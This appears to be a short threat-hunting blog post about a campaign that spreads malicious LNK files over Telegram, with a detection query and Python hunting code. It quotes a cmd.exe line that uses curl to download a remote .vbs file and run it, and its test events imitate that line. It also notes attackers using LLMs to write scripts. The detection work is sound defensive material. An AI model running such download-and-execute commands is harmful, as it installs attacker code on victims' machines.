168. Adversaries Abuse LLM to Generate Malicious Scripts

Hello everyone!

I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center.

The threat actors used Telegram to distribute archives with malicious LNK files. These files abused cURL to download a malicious .vbs file from a remote server, for example:

C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

Here we have a nice hunting opportunity:

event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs"
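As an added example (not from the original post), here is the hunt above run in Python over a handful of constructed process-creation events, with each hit triaged for the download URL and drop path. Field names follow the query; the case-insensitive match and the sample events are assumptions.

```python
import re

# Constructed sample process-creation events (not real telemetry), using the
# field names from the hunting query above.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": 'C:\\Windows\\System32\\cmd.exe /c "curl -o C:\\Users\\Public\\aa.vbs '
                'https://example.invalid/payload.vbs && start C:\\Users\\Public\\aa.vbs"'},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl -o C:\\Users\\Public\\aa.vbs https://example.invalid/payload.vbs"},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl -O https://example.invalid/tools.zip"},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\x.VBS https://example.invalid/p"},
    {"event_type": "networkconnectwin", "proc_file_name": "curl.exe",
     "cmdline": "curl -o a.vbs https://example.invalid/a.vbs"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# curl flags are case-sensitive (-O means "remote name"), so no IGNORECASE here.
OUT_RE = re.compile(r"(?:-o|--output)\s+(\S+)")

def matches_hunt(event):
    """Apply the hunt: a curl.exe process creation whose command line mentions vbs.
    Assumption: the substring match is case-insensitive, so 'x.VBS' is caught too."""
    return (event.get("event_type") == "processcreatewin"
            and event.get("proc_file_name", "").lower() == "curl.exe"
            and "vbs" in event.get("cmdline", "").lower())

def triage(event):
    """Pull the remote URL and local drop path out of a matching command line."""
    cmd = event["cmdline"]
    url = URL_RE.search(cmd)
    out = OUT_RE.search(cmd)
    return {"url": url.group(0) if url else None,
            "drop_path": out.group(1) if out else None}

def hunt(events):
    """Return triage records for every event that matches the hunt."""
    return [triage(e) for e in events if matches_hunt(e)]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The parent cmd.exe event carries the same command line but is not a curl.exe process creation, so it is left for the hunt on the child process.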

So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it!

See you tomorrow!
